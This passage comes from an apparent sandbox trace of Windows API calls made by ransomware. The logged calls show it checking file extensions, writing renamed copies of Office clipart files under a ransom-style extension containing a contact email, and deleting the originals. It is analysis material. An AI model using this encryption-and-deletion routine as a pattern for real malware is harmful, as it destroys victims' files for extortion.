returned -1 [0063.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0063.524] lstrlenW (lpString=".1cd") returned 4 [0063.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0063.524] lstrlenW (lpString=".jpg") returned 4 [0063.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.525] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.525] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.525] GetLastError () returned 0x0 [0063.525] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1eb6, lpOverlapped=0x0) returned 1 [0063.545] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1ec0, lpOverlapped=0x0) returned 1 [0063.546] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.546] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.546] SetEndOfFile (hFile=0x344) returned 1 [0063.546] CloseHandle (hObject=0x344) returned 1 [0063.547] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.547] SetEndOfFile (hFile=0x368) returned 1 [0063.548] CloseHandle (hObject=0x368) returned 1 [0063.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.549] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf")) returned 1 [0063.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0063.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0063.549] lstrlenW (lpString=".doc") returned 4 [0063.549] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.549] lstrlenW (lpString=".docx") returned 5 [0063.549] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.549] lstrlenW (lpString=".pdf") returned 4 [0063.549] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.549] lstrlenW (lpString=".xls") returned 4 [0063.549] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.549] lstrlenW (lpString=".xlsx") returned 5 [0063.550] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.550] lstrlenW (lpString=".ppt") returned 4 [0063.550] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0063.550] lstrlenW (lpString=".zip") returned 4 [0063.550] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.550] lstrlenW (lpString=".rar") returned 4 [0063.550] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.550] lstrlenW (lpString=".bz2") returned 4 [0063.550] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.550] lstrlenW (lpString=".7z") returned 3 [0063.550] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0063.550] lstrlenW (lpString=".dbf") returned 4 [0063.550] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0063.550] lstrlenW (lpString=".1cd") returned 4 [0063.550] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0063.550] lstrlenW (lpString=".jpg") returned 4 [0063.550] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.551] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.551] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.551] GetLastError () returned 0x0 [0063.551] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x27a2, lpOverlapped=0x0) returned 1 [0063.563] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x27b0, lpOverlapped=0x0) returned 1 [0063.564] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.564] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.564] SetEndOfFile (hFile=0x344) returned 1 [0063.568] CloseHandle (hObject=0x344) returned 1 [0063.569] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.569] SetEndOfFile (hFile=0x368) returned 1 [0063.571] CloseHandle (hObject=0x368) returned 1 [0063.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.571] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf")) returned 1 [0063.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0063.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0063.572] lstrlenW (lpString=".doc") returned 4 [0063.572] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.572] lstrlenW (lpString=".docx") returned 5 [0063.572] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.572] lstrlenW (lpString=".pdf") returned 4 [0063.572] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.573] lstrlenW (lpString=".xls") returned 4 [0063.573] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.573] lstrlenW (lpString=".xlsx") returned 5 [0063.573] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.573] lstrlenW (lpString=".ppt") returned 4 [0063.573] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0063.573] lstrlenW (lpString=".zip") returned 4 [0063.573] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.573] lstrlenW (lpString=".rar") returned 4 [0063.573] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.573] lstrlenW (lpString=".bz2") returned 4 [0063.573] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.573] lstrlenW (lpString=".7z") returned 3 [0063.573] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0063.573] lstrlenW (lpString=".dbf") returned 4 [0063.573] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0063.573] lstrlenW (lpString=".1cd") returned 4 [0063.573] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0063.573] lstrlenW (lpString=".jpg") returned 4 [0063.573] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.575] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.575] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.575] GetLastError () returned 0x0 [0063.575] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x5ec, lpOverlapped=0x0) returned 1 [0063.586] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x5f0, lpOverlapped=0x0) returned 1 [0063.587] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.587] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.587] SetEndOfFile (hFile=0x358) returned 1 [0063.587] CloseHandle (hObject=0x358) returned 1 [0063.588] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.588] SetEndOfFile (hFile=0x350) returned 1 [0063.589] CloseHandle (hObject=0x350) returned 1 [0063.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00152_.wmf")) returned 1 [0063.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0063.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0063.590] lstrlenW (lpString=".doc") returned 4 [0063.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.590] lstrlenW (lpString=".docx") returned 5 [0063.590] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.590] lstrlenW (lpString=".pdf") returned 4 [0063.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.590] lstrlenW (lpString=".xls") returned 4 [0063.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.590] lstrlenW (lpString=".xlsx") returned 5 [0063.590] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.590] lstrlenW (lpString=".ppt") returned 4 [0063.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0063.590] lstrlenW (lpString=".zip") returned 4 [0063.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.590] lstrlenW (lpString=".rar") returned 4 [0063.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.590] lstrlenW (lpString=".bz2") returned 4 [0063.590] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.590] lstrlenW (lpString=".7z") returned 3 [0063.590] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0063.590] lstrlenW (lpString=".dbf") returned 4 [0063.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0063.590] lstrlenW (lpString=".1cd") returned 4 [0063.590] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0063.590] lstrlenW (lpString=".jpg") returned 4 [0063.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.599] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.599] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.601] GetLastError () returned 0x0 [0063.601] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1f86, lpOverlapped=0x0) returned 1 [0063.614] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1f90, lpOverlapped=0x0) returned 1 [0063.615] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.615] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.615] SetEndOfFile (hFile=0x354) returned 1 [0063.615] CloseHandle (hObject=0x354) returned 1 [0063.616] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.616] SetEndOfFile (hFile=0x2c8) returned 1 [0063.617] CloseHandle (hObject=0x2c8) returned 1 [0063.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.617] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf")) returned 1 [0063.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0063.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0063.617] lstrlenW (lpString=".doc") returned 4 [0063.617] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.617] lstrlenW (lpString=".docx") returned 5 [0063.617] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.617] lstrlenW (lpString=".pdf") returned 4 [0063.617] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.617] lstrlenW (lpString=".xls") returned 4 [0063.617] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.618] lstrlenW (lpString=".xlsx") returned 5 [0063.618] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.618] lstrlenW (lpString=".ppt") returned 4 [0063.618] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0063.618] lstrlenW (lpString=".zip") returned 4 [0063.618] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.618] lstrlenW (lpString=".rar") returned 4 [0063.618] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.618] lstrlenW (lpString=".bz2") returned 4 [0063.618] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.618] lstrlenW (lpString=".7z") returned 3 [0063.618] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0063.618] lstrlenW (lpString=".dbf") returned 4 [0063.618] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0063.618] lstrlenW (lpString=".1cd") returned 4 [0063.618] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0063.618] lstrlenW (lpString=".jpg") returned 4 [0063.618] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.618] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.618] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.619] GetLastError () returned 0x0 [0063.619] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x600, lpOverlapped=0x0) returned 1 [0063.636] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x610, lpOverlapped=0x0) returned 1 [0063.637] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.637] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.637] SetEndOfFile (hFile=0x354) returned 1 [0063.638] CloseHandle (hObject=0x354) returned 1 [0063.638] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.638] SetEndOfFile (hFile=0x2c8) returned 1 [0063.639] CloseHandle (hObject=0x2c8) returned 1 [0063.639] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf")) returned 1 [0063.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0063.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0063.640] lstrlenW (lpString=".doc") returned 4 [0063.640] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.640] lstrlenW (lpString=".docx") returned 5 [0063.640] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.640] lstrlenW (lpString=".pdf") returned 4 [0063.640] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.640] lstrlenW (lpString=".xls") returned 4 [0063.640] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.640] lstrlenW (lpString=".xlsx") returned 5 [0063.640] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.640] lstrlenW (lpString=".ppt") returned 4 [0063.640] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0063.640] lstrlenW (lpString=".zip") returned 4 [0063.640] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.640] lstrlenW (lpString=".rar") returned 4 [0063.640] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.640] lstrlenW (lpString=".bz2") returned 4 [0063.640] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.640] lstrlenW (lpString=".7z") returned 3 [0063.640] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0063.641] lstrlenW (lpString=".dbf") returned 4 [0063.641] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0063.641] lstrlenW (lpString=".1cd") returned 4 [0063.641] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0063.641] lstrlenW (lpString=".jpg") returned 4 [0063.641] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.641] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.641] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.641] GetLastError () returned 0x0 [0063.642] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x30c2, lpOverlapped=0x0) returned 1 [0063.655] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x30d0, lpOverlapped=0x0) returned 1 [0063.656] ReadFile 